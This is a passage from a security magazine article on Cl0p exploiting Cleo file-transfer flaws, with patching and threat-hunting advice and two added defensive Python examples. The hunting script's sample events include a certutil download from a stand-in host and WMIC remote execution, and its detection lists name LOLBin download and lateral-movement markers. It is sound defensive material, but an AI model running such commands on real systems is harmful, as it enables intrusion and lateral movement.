• The vulnerabilities have high risk scores (CVSS).
• The vulnerabilities allow attackers to take control of a system remotely (remote code execution, RCE).
• The vulnerabilities affect software that is accessible from the Internet.
• An exploit developer or malicious actor has already published a proof of concept (PoC) for the exploitation process.
Within 24 hours of a vulnerability’s public disclosure, threat actors launch automated scanners that sweep the Internet and establish remote access to vulnerable systems. After this initial access blitz comes the second stage of the attack: the manual hacking of the victims. This second stage takes time.
Attackers need to work out which compromised systems are worth their effort, and then they have to hack their way deeper by hand, typically using living-off-the-land techniques (abusing tools already present on the system) to evade detection. Because of this delay, the actual ransomware deployment or data theft typically happens weeks or even months after the initial compromise.
In Cl0p’s case, Bitdefender’s analysis points to the exploitation of two recent vulnerabilities in Cleo file transfer software, CVE-2024-50623 and CVE-2024-55956. Both are rated 9.8 out of 10 in severity (CVSS) and allowed attackers to run arbitrary commands on vulnerable systems. Although the vulnerabilities were disclosed in October and December 2024 respectively, the manual part of the attack is what takes time, which explains why these victims are only appearing now.
Here are a few key defences that can make a significant difference:
• Smart Patching: Prioritise patches for actively exploited vulnerabilities and maintain awareness of known exploits, for example via CISA’s Known Exploited Vulnerabilities (KEV) catalogue. A flexible patching strategy is key to rapid response.
• Threat Hunting: Proactively search your network for hidden threats. Discover backdoors left behind in the initial access stage before attackers launch their main attack.
• EDR / XDR with SOC / MDR: Use advanced detection systems (EDR / XDR) and expert analysis (SOC / MDR) to detect attackers moving within your network (lateral movement) and stop them before they reach critical data.
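The four "patch first" criteria listed earlier and the KEV-driven patching advice above can be turned into a repeatable triage step. The following Python is an added example, not code from the article or from Bitdefender: it scores a constructed asset inventory against a constructed excerpt that follows the field names of the CISA KEV JSON feed, then ranks what to patch first. The two Cleo CVE IDs are real; the due dates, asset names, the exposure flags and the CVE-0000-000x placeholder identifiers are illustrative assumptions.

```python
"""Rank patching work from an asset inventory against a KEV-style feed.

Scores the four "patch first" criteria (high CVSS, RCE, Internet exposure,
public PoC / known exploitation) and treats presence in the CISA Known
Exploited Vulnerabilities catalogue as the strongest single signal.
KEV_SAMPLE and SAMPLE_FINDINGS are constructed sample data.
"""
import json
from dataclasses import dataclass

# Constructed excerpt in the shape of the CISA KEV JSON feed
# (https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json).
# Field names follow the real schema; the dates are illustrative, not quoted from the catalogue.
KEV_SAMPLE = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities (constructed excerpt)",
    "vulnerabilities": [
        {"cveID": "CVE-2024-50623", "vendorProject": "Cleo", "product": "Multiple Products",
         "knownRansomwareCampaignUse": "Known", "dueDate": "2025-01-03"},
        {"cveID": "CVE-2024-55956", "vendorProject": "Cleo", "product": "Multiple Products",
         "knownRansomwareCampaignUse": "Known", "dueDate": "2025-01-07"},
    ],
})


@dataclass
class Finding:
    asset: str
    cve: str
    cvss: float
    rce: bool                  # vulnerability yields remote code execution
    internet_exposed: bool     # asset is reachable from the Internet
    public_poc: bool = False   # a PoC is public (from vendor or threat-intel notes)


# Constructed inventory. CVE-0000-000x are placeholder identifiers, not real CVEs.
SAMPLE_FINDINGS = [
    Finding("mft-gw-01", "CVE-2024-50623", 9.8, rce=True, internet_exposed=True, public_poc=True),
    Finding("build-01", "CVE-2024-55956", 9.8, rce=True, internet_exposed=False),
    Finding("hr-portal", "CVE-0000-0001", 8.1, rce=True, internet_exposed=True, public_poc=True),
    Finding("intranet-wiki", "CVE-0000-0002", 7.5, rce=False, internet_exposed=False),
]


def load_kev(feed_json: str) -> dict[str, dict]:
    """Index a KEV feed by CVE ID."""
    return {v["cveID"]: v for v in json.loads(feed_json)["vulnerabilities"]}


def score_finding(f: Finding, kev: dict[str, dict]) -> tuple[int, list[str]]:
    """Additive score: a KEV listing (proof of active exploitation) outweighs any one other criterion."""
    points, reasons = 0, []
    if f.cvss >= 9.0:
        points += 2
        reasons.append(f"critical CVSS {f.cvss}")
    elif f.cvss >= 7.0:
        points += 1
        reasons.append(f"high CVSS {f.cvss}")
    if f.rce:
        points += 2
        reasons.append("RCE")
    if f.internet_exposed:
        points += 2
        reasons.append("Internet-exposed")
    entry = kev.get(f.cve)
    if entry is not None:
        points += 3
        reasons.append(f"in KEV (due {entry['dueDate']})")
        if entry.get("knownRansomwareCampaignUse") == "Known":
            points += 1
            reasons.append("known ransomware use")
    elif f.public_poc:
        points += 1
        reasons.append("public PoC")
    return points, reasons


def tier(points: int) -> str:
    """Map a score to a patching window; thresholds are an assumption to tune locally."""
    if points >= 8:
        return "emergency"
    if points >= 5:
        return "scheduled"
    return "routine"


def prioritise(findings: list[Finding], kev: dict[str, dict]) -> list[dict]:
    """Return findings ranked highest-risk first, each with its score, tier and reasons."""
    rows = []
    for f in findings:
        pts, why = score_finding(f, kev)
        rows.append({"asset": f.asset, "cve": f.cve, "score": pts, "tier": tier(pts), "reasons": why})
    return sorted(rows, key=lambda r: (-r["score"], r["asset"]))


if __name__ == "__main__":
    for r in prioritise(SAMPLE_FINDINGS, load_kev(KEV_SAMPLE)):
        print(f"{r['tier']:9} {r['score']:2}  {r['asset']:14} {r['cve']:15} {', '.join(r['reasons'])}")
```

Note that the internal build server carrying a KEV-listed flaw still outranks an Internet-facing host with a merely "high" non-KEV finding: active exploitation in the wild is the criterion that moves a patch into the emergency window, which is the point of tracking the catalogue rather than CVSS alone.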
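What the threat-hunting and EDR/XDR review described in the last two points look like in practice, as an added example that is not part of the article: three generic rules run over constructed process-creation events in JSON-lines form. The patterns hunted for are a server process spawning a command interpreter (the backdoor left by the automated first stage), a living-off-the-land binary fetching a file, and remote command execution against another host (lateral movement). Host names, the 203.0.113.5 address and the process lists are constructed assumptions, and the rules are generic, not indicators from the Cl0p campaign.

```python
"""Hunt for post-exploitation behaviour in process-creation telemetry.

Rules (all generic, not vendor- or campaign-specific):
  server-spawns-shell    a web/app server process starts a command interpreter
  lolbin-download        a built-in tool is used to fetch a file from the network
  lateral-movement       a command targets another host for remote execution
  remote-exec-on-target  the receiving side of remote execution starts a shell
EVENTS is constructed sample data in an EDR-style JSON-lines layout.
"""
import json

# Constructed events. Hosts, timestamps and 203.0.113.5 are made up;
# ws-042 is the benign control case that must not alert.
EVENTS = r"""
{"host":"mft-gw-01","ts":"2025-01-10T02:13:04Z","parent":"java.exe","image":"cmd.exe","cmdline":"cmd.exe /c whoami"}
{"host":"mft-gw-01","ts":"2025-01-10T02:13:09Z","parent":"cmd.exe","image":"certutil.exe","cmdline":"certutil.exe -urlcache -split -f http://203.0.113.5/a.txt C:\\Windows\\Temp\\a.txt"}
{"host":"mft-gw-01","ts":"2025-01-10T02:15:40Z","parent":"powershell.exe","image":"wmic.exe","cmdline":"wmic /node:fs-01 process call create \"cmd.exe /c net user\""}
{"host":"fs-01","ts":"2025-01-10T02:15:41Z","parent":"WmiPrvSE.exe","image":"cmd.exe","cmdline":"cmd.exe /c net user"}
{"host":"ws-042","ts":"2025-01-10T09:01:00Z","parent":"explorer.exe","image":"cmd.exe","cmdline":"cmd.exe /c dir"}
"""

# Parent processes that should never need an interactive shell (extend with your own app servers).
SERVER_PARENTS = {"java.exe", "java", "w3wp.exe", "httpd", "tomcat", "nginx", "php-fpm"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "sh", "bash", "dash"}
# Service hosts that spawn shells on behalf of a remote caller (WMI, WinRM, PsExec service).
REMOTE_EXEC_PARENTS = {"wmiprvse.exe", "wsmprovhost.exe", "psexesvc.exe"}
# Living-off-the-land binaries and the argument that marks a download/execute use.
LOLBIN_DOWNLOAD = {
    "certutil.exe": ("-urlcache", "urlcache"),
    "bitsadmin.exe": ("/transfer",),
    "mshta.exe": ("http",),
    "regsvr32.exe": ("/i:http", "scrobj.dll"),
}
# Command-line fragments that target another machine.
LATERAL_MARKERS = ("/node:", "psexec", "winrs -r:", "-computername")


def hunt(jsonl: str) -> list[dict]:
    """Run every rule over each event; an event may raise several alerts."""
    alerts = []
    for line in jsonl.strip().splitlines():
        ev = json.loads(line)
        parent, image = ev["parent"].lower(), ev["image"].lower()
        cmd = ev["cmdline"].lower()
        hits = []
        if parent in SERVER_PARENTS and image in SHELLS:
            hits.append(("server-spawns-shell", f"{parent} -> {image}"))
        if parent in REMOTE_EXEC_PARENTS and image in SHELLS:
            hits.append(("remote-exec-on-target", f"{parent} -> {image}"))
        for marker in LOLBIN_DOWNLOAD.get(image, ()):
            if marker in cmd:
                hits.append(("lolbin-download", f"{image} {marker}"))
                break
        for marker in LATERAL_MARKERS:
            if marker in cmd:
                hits.append(("lateral-movement", marker.strip()))
                break
        for rule, detail in hits:
            alerts.append({"host": ev["host"], "ts": ev["ts"], "rule": rule,
                           "detail": detail, "cmdline": ev["cmdline"]})
    return alerts


def hosts_to_triage(alerts: list[dict]) -> list[tuple[str, int, str]]:
    """Hosts ordered by how many distinct rules fired (then earliest alert): where to start."""
    by_host: dict[str, dict] = {}
    for a in alerts:
        h = by_host.setdefault(a["host"], {"rules": set(), "first": a["ts"]})
        h["rules"].add(a["rule"])
        h["first"] = min(h["first"], a["ts"])
    return sorted(((host, len(v["rules"]), v["first"]) for host, v in by_host.items()),
                  key=lambda t: (-t[1], t[2]))


if __name__ == "__main__":
    found = hunt(EVENTS)
    for a in found:
        print(f"{a['ts']} {a['host']:10} {a['rule']:22} {a['detail']}")
    print("triage order:", hosts_to_triage(found))
```

The first rule is the one worth tuning most carefully: point SERVER_PARENTS at the real process name of the file-transfer or web application on each exposed host, and a shell spawned by it is a high-confidence sign of the first-stage backdoor, found while the attackers are still in the slow manual phase rather than after the ransomware runs.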
WWW.INTELLIGENTCISO.COM 23